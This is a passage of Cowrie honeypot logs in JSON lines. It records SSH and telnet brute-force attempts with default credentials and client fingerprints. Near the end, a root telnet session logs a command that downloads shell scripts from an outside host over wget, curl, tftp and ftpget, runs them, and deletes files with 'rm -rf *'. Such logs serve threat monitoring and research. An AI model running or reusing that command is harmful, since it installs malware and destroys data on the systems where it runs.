ssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:52:51.800576Z","src_ip":"212.227.125.160","session":"70f53885ef30"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T00:52:52.053380Z","src_ip":"212.227.125.160","session":"70f53885ef30"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:52:53.202760Z","src_ip":"212.227.125.160","session":"70f53885ef30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41878,"dst_ip":"1.2.3.4","dst_port":22,"session":"9591b6a51dc1","protocol":"ssh","message":"New connection: 212.227.125.160:41878 (1.2.3.4:22) [session: 9591b6a51dc1]","sensor":"my-vps","timestamp":"2025-08-31T00:53:02.232307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:02.233190Z","src_ip":"212.227.125.160","session":"9591b6a51dc1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:53:02.308138Z","src_ip":"212.227.125.160","session":"9591b6a51dc1"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:02.531922Z","src_ip":"212.227.125.160","session":"9591b6a51dc1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:03.610175Z","src_ip":"212.227.125.160","session":"9591b6a51dc1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47144,"dst_ip":"1.2.3.4","dst_port":23,"session":"9dc1935b2032","protocol":"telnet","message":"New connection: 212.227.125.160:47144 (1.2.3.4:23) [session: 9dc1935b2032]","sensor":"my-vps","timestamp":"2025-08-31T00:53:09.486894Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53714,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6f85fce3b04","protocol":"ssh","message":"New connection: 212.227.125.160:53714 (1.2.3.4:22) [session: b6f85fce3b04]","sensor":"my-vps","timestamp":"2025-08-31T00:53:12.720848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:12.721720Z","src_ip":"212.227.125.160","session":"b6f85fce3b04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:53:12.795732Z","src_ip":"212.227.125.160","session":"b6f85fce3b04"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:13.040730Z","src_ip":"212.227.125.160","session":"b6f85fce3b04"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:14.191982Z","src_ip":"212.227.125.160","session":"b6f85fce3b04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42106,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0ffe66bad46","protocol":"ssh","message":"New connection: 212.227.235.229:42106 (1.2.3.4:22) [session: e0ffe66bad46]","sensor":"my-vps","timestamp":"2025-08-31T00:53:14.653709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:15.834956Z","src_ip":"212.227.235.229","session":"e0ffe66bad46"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:53:15.835958Z","src_ip":"212.227.235.229","session":"e0ffe66bad46"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"welcome","message":"login attempt [daemon/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:21.630137Z","src_ip":"212.227.235.229","session":"e0ffe66bad46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44710,"dst_ip":"1.2.3.4","dst_port":22,"session":"904c1858605a","protocol":"ssh","message":"New connection: 212.227.125.160:44710 (1.2.3.4:22) [session: 904c1858605a]","sensor":"my-vps","timestamp":"2025-08-31T00:53:23.104940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:23.105848Z","src_ip":"212.227.125.160","session":"904c1858605a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:53:23.180147Z","src_ip":"212.227.125.160","session":"904c1858605a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:23.386151Z","src_ip":"212.227.235.229","session":"e0ffe66bad46"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:23.452295Z","src_ip":"212.227.125.160","session":"904c1858605a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:24.580062Z","src_ip":"212.227.125.160","session":"904c1858605a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38818,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e6a56bf9cbd","protocol":"ssh","message":"New connection: 212.227.235.229:38818 (1.2.3.4:22) [session: 5e6a56bf9cbd]","sensor":"my-vps","timestamp":"2025-08-31T00:53:29.261688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:53:29.262537Z","src_ip":"212.227.235.229","session":"5e6a56bf9cbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:53:29.329045Z","src_ip":"212.227.235.229","session":"5e6a56bf9cbd"}
{"eventid":"cowrie.login.failed","username":"www","password":"password123456789","message":"login attempt [www/password123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:29.637233Z","src_ip":"212.227.235.229","session":"5e6a56bf9cbd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:30.706130Z","src_ip":"212.227.235.229","session":"5e6a56bf9cbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58114,"dst_ip":"1.2.3.4","dst_port":22,"session":"b16cce8aaa82","protocol":"ssh","message":"New connection: 212.227.125.160:58114 (1.2.3.4:22) [session: b16cce8aaa82]","sensor":"my-vps","timestamp":"2025-08-31T00:53:33.503413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:33.504099Z","src_ip":"212.227.125.160","session":"b16cce8aaa82"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:53:33.577552Z","src_ip":"212.227.125.160","session":"b16cce8aaa82"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:33.833317Z","src_ip":"212.227.125.160","session":"b16cce8aaa82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43068,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dcec6d009e9","protocol":"ssh","message":"New connection: 212.227.235.229:43068 (1.2.3.4:22) [session: 1dcec6d009e9]","sensor":"my-vps","timestamp":"2025-08-31T00:53:34.028900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:53:34.032442Z","src_ip":"212.227.235.229","session":"1dcec6d009e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:53:34.268396Z","src_ip":"212.227.235.229","session":"1dcec6d009e9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:34.972853Z","src_ip":"212.227.125.160","session":"b16cce8aaa82"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"sprixin","message":"login attempt [ftptest/sprixin] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:35.227093Z","src_ip":"212.227.235.229","session":"1dcec6d009e9"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:36.467524Z","src_ip":"212.227.235.229","session":"1dcec6d009e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33112,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c9310b47920","protocol":"ssh","message":"New connection: 212.227.125.160:33112 (1.2.3.4:22) [session: 3c9310b47920]","sensor":"my-vps","timestamp":"2025-08-31T00:53:36.847358Z"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.204","src_port":32804,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1a9e35f4793","protocol":"telnet","message":"New connection: 176.65.148.204:32804 (1.2.3.4:23) [session: d1a9e35f4793]","sensor":"my-vps","timestamp":"2025-08-31T00:53:37.471106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:53:37.801599Z","src_ip":"212.227.125.160","session":"3c9310b47920"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:53:37.802338Z","src_ip":"212.227.125.160","session":"3c9310b47920"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:38.812336Z","src_ip":"176.65.148.204","session":"d1a9e35f4793"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"welcome","message":"login attempt [daemon/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T00:53:39.346401Z","src_ip":"212.227.125.160","session":"3c9310b47920"}
{"eventid":"cowrie.session.closed","duration":30.62636423110962,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:40.113180Z","src_ip":"212.227.125.160","session":"9dc1935b2032"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:40.870473Z","src_ip":"212.227.125.160","session":"3c9310b47920"}
{"eventid":"cowrie.session.closed","duration":3.6403799057006836,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:53:41.111418Z","src_ip":"176.65.148.204","session":"d1a9e35f4793"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.204","src_port":41866,"dst_ip":"1.2.3.4","dst_port":23,"session":"fcc8baabc7e8","protocol":"telnet","message":"New connection: 176.65.148.204:41866 (1.2.3.4:23) [session: fcc8baabc7e8]","sensor":"my-vps","timestamp":"2025-08-31T00:53:41.128660Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:53:42.268818Z","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:53:42.289646Z","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
{"eventid":"cowrie.command.input","input":"cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.155.94.168/ohshit.sh; curl -O http://202.155.94.168/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 202.155.94.168 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 202.155.94.168; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 202.155.94.168 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *","message":"CMD: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.155.94.168/ohshit.sh; curl -O http://202.155.94.168/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 202.155.94.168 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 202.155.94.168; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 202.155.94.168 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.007620Z","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
{"eventid":"cowrie.session.file_download","url":"http://202.155.94.168/ohshit.sh","outfile":"var/lib/cowrie/downloads/a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888","shasum":"a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.377470Z","message":"Downloaded URL (http://202.155.94.168/ohshit.sh) with SHA-256 a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888 to var/lib/cowrie/downloads/a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
{"eventid":"cowrie.session.file_download","url":"http://202.155.94.168/ohshit.sh","outfile":"var/lib/cowrie/downloads/a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888","shasum":"a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888","sensor":"my-vps","timestamp":"2025-08-31T00:53:43.561136Z","message":"Downloaded URL (http://202.155.94.168/ohshit.sh) with SHA-256 a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888 to var/lib/cowrie/downloads/a350c5f3223e2fcdf116a52a42d84cb5789d328ebf51fc814b6a817013a76888","src_ip":"176.65.148.204","session":"fcc8baabc7e8"}
